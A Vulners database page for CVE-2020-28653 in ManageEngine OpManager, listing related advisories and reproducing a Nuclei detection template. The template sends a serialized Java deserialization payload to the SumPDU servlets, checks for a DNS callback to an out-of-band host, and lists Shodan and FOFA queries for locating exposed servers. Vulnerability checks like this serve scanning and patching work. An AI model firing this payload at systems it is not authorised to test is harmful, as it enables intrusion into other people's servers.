| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Exploit for CVE-2020-2853 | 13 Sep 202117:27 | – | githubexploit | |
| ManageEngine OpManager SumPDU Java Deserialization Exploit | 21 Sep 202100:00 | – | zdt | |
| CVE-2020-28653 | 3 Feb 202118:49 | – | circl | |
| ZOHO ManageEngine OpManager 安全漏洞 | 3 Feb 202100:00 | – | cnnvd | |
| ZOHO ManageEngine OpManager Remote Code Execution Vulnerability | 5 Feb 202100:00 | – | cnvd | |
| CVE-2020-28653 | 3 Feb 202116:00 | – | cve | |
| CVE-2020-28653 | 3 Feb 202116:00 | – | cvelist | |
| ManageEngine OpManager Smart Update Manager RCE | 2 Apr 202100:00 | – | nessus | |
| ManageEngine OpManager SumPDU Java Deserialization | 20 Sep 202117:41 | – | metasploit | |
| CVE-2020-28653 | 3 Feb 202116:15 | – | nvd |
| Source | Link |
|---|---|
| packetstormsecurity | www.packetstormsecurity.com/files/164231/ManageEngine-OpManager-SumPDU-Java-Deserialization.html |
id: CVE-2020-28653
info:
name: ManageEngine OpManager SumPDU 12.1 - 12.5.232 - Java Deserialization
author: iamnoooob,pdresearch
severity: critical
description: |
Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.
impact: |
Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise.
remediation: |
Update to build 125203 or later.
reference:
- http://packetstormsecurity.com/files/164231/ManageEngine-OpManager-SumPDU-Java-Deserialization.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-28653
epss-score: 0.787
epss-percentile: 0.9954
cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
metadata:
vendor: zohocorp
product: manageengine_opmanager
shodan-query:
- http.title:"opmanager plus"
- http.title:"opmanager"
fofa-query:
- title="opmanager plus"
- title="opmanager"
google-query:
- intitle:"opmanager plus"
- intitle:"opmanager"
tags: cve,cve2020,packetstorm,java,deserialization,rce,opmanager,intrusive,vuln,vkev
variables:
oast: ".{{interactsh-url}}"
payload: "{{padding(oast,'a',50,'prefix')}}"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- "status_code == 200"
- 'contains(body, "ManageEngine")'
condition: and
internal: true
- raw:
- |
POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
matchers:
- type: dsl
dsl:
- "status_code == 200"
internal: true
- raw:
- |
POST /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
{{base64_decode('rO0ABXcEAAAD6g==')}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
internal: true
- raw:
- |
POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
{{replace(base64_decode('AAABX6ztAAVzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAMdwgAAAAQAAAAAXNyAAxqYXZhLm5ldC5VUkyWJTc2GvzkcgMAB0kACGhhc2hDb2RlSQAEcG9ydEwACWF1dGhvcml0eXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABGZpbGVxAH4AA0wABGhvc3RxAH4AA0wACHByb3RvY29scQB+AANMAANyZWZxAH4AA3hw//////////90ADJhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYXQAAHEAfgAFdAAEaHR0cHB4dAA5aHR0cDovL2FhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFheA=='),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', payload)}}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
# digest: 4b0a00483046022100a8f2f274ada6e342516a89b6d2a56c0d7acb6836c181f7243053e484cdd4a5cc0221008cc6d6243532609ee558d49080180132530edcb886b2ad0033a4925a5da507c8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation